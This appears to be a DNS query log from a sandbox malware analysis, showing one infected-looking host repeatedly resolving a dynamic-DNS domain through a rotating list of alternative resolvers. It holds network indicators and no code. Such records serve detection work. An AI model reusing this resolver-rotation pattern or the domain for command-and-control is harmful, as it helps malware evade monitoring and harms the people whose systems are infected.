                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.287127018 CEST192.168.2.9178.17.170.1330xe2e6Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.359395027 CEST192.168.2.91.1.1.10xab34Standard query (0)ns2.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.403953075 CEST192.168.2.9185.14.29.1400x31f8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.475657940 CEST192.168.2.9185.14.29.1400x31f8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.584338903 CEST192.168.2.9185.14.29.1400x31f8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.682921886 CEST192.168.2.9185.14.29.1400x31f8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.820609093 CEST192.168.2.9185.14.29.1400x31f8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.852056026 CEST192.168.2.91.1.1.10xfc84Standard query (0)anyone.dnsrec.meo.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.876058102 CEST192.168.2.91.1.1.10x3338Standard query (0)ist.fellig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.957289934 CEST192.168.2.9178.63.145.2360xfa07Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:48.061393023 CEST192.168.2.9178.63.145.2360xfa07Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.053002119 CEST192.168.2.9178.63.145.2360xfa07Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:51.055744886 CEST192.168.2.9178.63.145.2360xfa07Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.075635910 CEST192.168.2.9178.63.145.2360xfa07Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.105410099 CEST192.168.2.91.1.1.10x6466Standard query (0)civet.ziphaze.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.290870905 CEST192.168.2.91.1.1.10xbb93Standard query (0)ns2.fr.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.306948900 CEST192.168.2.937.187.0.400xc3ceStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.330467939 CEST192.168.2.937.187.0.400xc3ceStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.356071949 CEST192.168.2.937.187.0.400xc3ceStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:03.378263950 CEST192.168.2.937.187.0.400xc3ceStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.394680023 CEST192.168.2.937.187.0.400xc3ceStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.416029930 CEST192.168.2.91.1.1.10x8c95Standard query (0)ns1.sg.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.429898977 CEST192.168.2.9128.199.248.1050x1478Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.696217060 CEST192.168.2.9128.199.248.1050x1478Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.994323969 CEST192.168.2.9128.199.248.1050x1478Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.274817944 CEST192.168.2.9128.199.248.1050x1478Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.540767908 CEST192.168.2.9128.199.248.1050x1478Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.809606075 CEST192.168.2.91.1.1.10xa04cStandard query (0)ns1.nl.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.824693918 CEST192.168.2.995.85.9.860xd90fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.944771051 CEST192.168.2.995.85.9.860xd90fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:14.969053030 CEST192.168.2.995.85.9.860xd90fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.168519974 CEST192.168.2.995.85.9.860xd90fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:21.193299055 CEST192.168.2.995.85.9.860xd90fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:25.208158016 CEST192.168.2.98.8.8.80xbad3Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.453645945 CEST192.168.2.91.1.1.10xf381Standard query (0)ns.dotbit.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.833549976 CEST192.168.2.91.1.1.10x23a1Standard query (0)alors.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.858210087 CEST192.168.2.91.1.1.10xd269Standard query (0)onyx.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.914700985 CEST192.168.2.91.1.1.10x6ee1Standard query (0)ns1.any.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.928569078 CEST192.168.2.91.1.1.10x59a7Standard query (0)ns1.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.943326950 CEST192.168.2.9178.17.170.1330x88a9Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.995310068 CEST192.168.2.9178.17.170.1330x88a9Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.049387932 CEST192.168.2.9178.17.170.1330x88a9Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.111963987 CEST192.168.2.9178.17.170.1330x88a9Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.152426004 CEST192.168.2.9178.17.170.1330x88a9Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.213438034 CEST192.168.2.91.1.1.10x7180Standard query (0)ns2.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.225241899 CEST192.168.2.9185.14.29.1400xb084Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.268364906 CEST192.168.2.9185.14.29.1400xb084Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.318845987 CEST192.168.2.9185.14.29.1400xb084Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.345148087 CEST192.168.2.9185.14.29.1400xb084Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.366326094 CEST192.168.2.9185.14.29.1400xb084Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.383181095 CEST192.168.2.91.1.1.10xbc9cStandard query (0)anyone.dnsrec.meo.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.396200895 CEST192.168.2.91.1.1.10x26c7Standard query (0)ist.fellig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.426521063 CEST192.168.2.9178.63.145.2360x395cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:34.470748901 CEST192.168.2.9178.63.145.2360x395cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:35.728871107 CEST192.168.2.9178.63.145.2360x395cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:37.736524105 CEST192.168.2.9178.63.145.2360x395cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.770945072 CEST192.168.2.9178.63.145.2360x395cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:45.832501888 CEST192.168.2.91.1.1.10x9cf6Standard query (0)civet.ziphaze.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:46.041745901 CEST192.168.2.91.1.1.10xeb38Standard query (0)ns2.fr.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:46.805542946 CEST192.168.2.937.187.0.400xfdb4Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:47.821424007 CEST192.168.2.937.187.0.400xfdb4Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.847404003 CEST192.168.2.937.187.0.400xfdb4Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.892198086 CEST192.168.2.937.187.0.400xfdb4Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.928977966 CEST192.168.2.937.187.0.400xfdb4Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:58.955209017 CEST192.168.2.91.1.1.10xd247Standard query (0)ns1.sg.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:58.970484018 CEST192.168.2.9128.199.248.1050x40f7Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:59.275609016 CEST192.168.2.9128.199.248.1050x40f7Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:59.566191912 CEST192.168.2.9128.199.248.1050x40f7Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:59.846750975 CEST192.168.2.9128.199.248.1050x40f7Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.142465115 CEST192.168.2.9128.199.248.1050x40f7Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.427730083 CEST192.168.2.91.1.1.10x78ecStandard query (0)ns1.nl.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.445039988 CEST192.168.2.995.85.9.860xad8fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.460053921 CEST192.168.2.995.85.9.860xad8fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:02.537067890 CEST192.168.2.995.85.9.860xad8fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:04.576143026 CEST192.168.2.995.85.9.860xad8fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:08.596256018 CEST192.168.2.995.85.9.860xad8fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.645678997 CEST192.168.2.98.8.8.80xf4a8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.028672934 CEST192.168.2.91.1.1.10x152Standard query (0)ns.dotbit.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.042274952 CEST192.168.2.91.1.1.10x8f39Standard query (0)alors.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.204072952 CEST192.168.2.91.1.1.10xb0bbStandard query (0)onyx.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.243251085 CEST192.168.2.91.1.1.10xe514Standard query (0)ns1.any.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.258398056 CEST192.168.2.91.1.1.10x389cStandard query (0)ns1.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.280816078 CEST192.168.2.9178.17.170.1330x1c31Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.348555088 CEST192.168.2.9178.17.170.1330x1c31Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.393537998 CEST192.168.2.9178.17.170.1330x1c31Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.438450098 CEST192.168.2.9178.17.170.1330x1c31Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.517610073 CEST192.168.2.9178.17.170.1330x1c31Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.562433004 CEST192.168.2.91.1.1.10x5628Standard query (0)ns2.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.572911978 CEST192.168.2.9185.14.29.1400x28c2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.593374014 CEST192.168.2.9185.14.29.1400x28c2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.615030050 CEST192.168.2.9185.14.29.1400x28c2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.633680105 CEST192.168.2.9185.14.29.1400x28c2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.657876968 CEST192.168.2.9185.14.29.1400x28c2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.683927059 CEST192.168.2.91.1.1.10x3bafStandard query (0)anyone.dnsrec.meo.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.697835922 CEST192.168.2.91.1.1.10x9eacStandard query (0)ist.fellig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.728336096 CEST192.168.2.9178.63.145.2360xd365Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:20.781780005 CEST192.168.2.9178.63.145.2360xd365Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:21.787961006 CEST192.168.2.9178.63.145.2360xd365Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:23.831501961 CEST192.168.2.9178.63.145.2360xd365Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:27.863054991 CEST192.168.2.9178.63.145.2360xd365Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:31.956614971 CEST192.168.2.91.1.1.10xc993Standard query (0)civet.ziphaze.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:31.993000984 CEST192.168.2.91.1.1.10xbb1fStandard query (0)ns2.fr.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:32.004920959 CEST192.168.2.937.187.0.400x7f1aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:33.019095898 CEST192.168.2.937.187.0.400x7f1aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:34.173814058 CEST192.168.2.937.187.0.400x7f1aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:36.207508087 CEST192.168.2.937.187.0.400x7f1aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:40.610044956 CEST192.168.2.937.187.0.400x7f1aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.680383921 CEST192.168.2.91.1.1.10x4637Standard query (0)ns1.sg.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.693070889 CEST192.168.2.9128.199.248.1050xbc53Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.006944895 CEST192.168.2.9128.199.248.1050xbc53Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.284589052 CEST192.168.2.9128.199.248.1050xbc53Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.566601038 CEST192.168.2.9128.199.248.1050xbc53Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.862570047 CEST192.168.2.9128.199.248.1050xbc53Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:46.677217007 CEST192.168.2.91.1.1.10x6759Standard query (0)ns1.nl.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:46.688342094 CEST192.168.2.995.85.9.860xac99Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:47.677342892 CEST192.168.2.995.85.9.860xac99Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:48.707534075 CEST192.168.2.995.85.9.860xac99Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.723176956 CEST192.168.2.995.85.9.860xac99Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:54.769339085 CEST192.168.2.995.85.9.860xac99Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:58.886259079 CEST192.168.2.98.8.8.80x6c3aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.532147884 CEST192.168.2.91.1.1.10x2a20Standard query (0)ns.dotbit.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.743879080 CEST192.168.2.91.1.1.10x7944Standard query (0)alors.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.910610914 CEST192.168.2.91.1.1.10xe761Standard query (0)onyx.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.126422882 CEST192.168.2.91.1.1.10x5ea2Standard query (0)ns1.any.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.303280115 CEST192.168.2.91.1.1.10x122dStandard query (0)ns1.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.329195023 CEST192.168.2.9178.17.170.1330xf2b8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.393614054 CEST192.168.2.9178.17.170.1330xf2b8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.472259045 CEST192.168.2.9178.17.170.1330xf2b8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.808763981 CEST192.168.2.9178.17.170.1330xf2b8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.850502968 CEST192.168.2.9178.17.170.1330xf2b8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.894366980 CEST192.168.2.91.1.1.10x87a5Standard query (0)ns2.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.904562950 CEST192.168.2.9185.14.29.1400xbdc8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.923754930 CEST192.168.2.9185.14.29.1400xbdc8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.944577932 CEST192.168.2.9185.14.29.1400xbdc8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.009167910 CEST192.168.2.9185.14.29.1400xbdc8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.044723988 CEST192.168.2.9185.14.29.1400xbdc8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.068959951 CEST192.168.2.91.1.1.10xda30Standard query (0)anyone.dnsrec.meo.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.086344004 CEST192.168.2.91.1.1.10x609fStandard query (0)ist.fellig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.144649029 CEST192.168.2.9178.63.145.2360x329dStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:08.158703089 CEST192.168.2.9178.63.145.2360x329dStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:09.245842934 CEST192.168.2.9178.63.145.2360x329dStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:11.301722050 CEST192.168.2.9178.63.145.2360x329dStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:15.325527906 CEST192.168.2.9178.63.145.2360x329dStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.379733086 CEST192.168.2.91.1.1.10x3b3eStandard query (0)civet.ziphaze.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.444880962 CEST192.168.2.91.1.1.10x82bcStandard query (0)ns2.fr.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.461707115 CEST192.168.2.937.187.0.400xf2cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:20.505163908 CEST192.168.2.937.187.0.400xf2cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:21.641191006 CEST192.168.2.937.187.0.400xf2cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:23.709696054 CEST192.168.2.937.187.0.400xf2cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:27.743957043 CEST192.168.2.937.187.0.400xf2cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:31.895919085 CEST192.168.2.91.1.1.10xfd75Standard query (0)ns1.sg.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.029779911 CEST192.168.2.91.1.1.10xfd75Standard query (0)ns1.sg.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.834800959 CEST192.168.2.9128.199.248.1050x201dStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:33.107023001 CEST192.168.2.9128.199.248.1050x201dStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:33.409229040 CEST192.168.2.9128.199.248.1050x201dStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:33.878577948 CEST192.168.2.9128.199.248.1050x201dStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.189891100 CEST192.168.2.9128.199.248.1050x201dStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
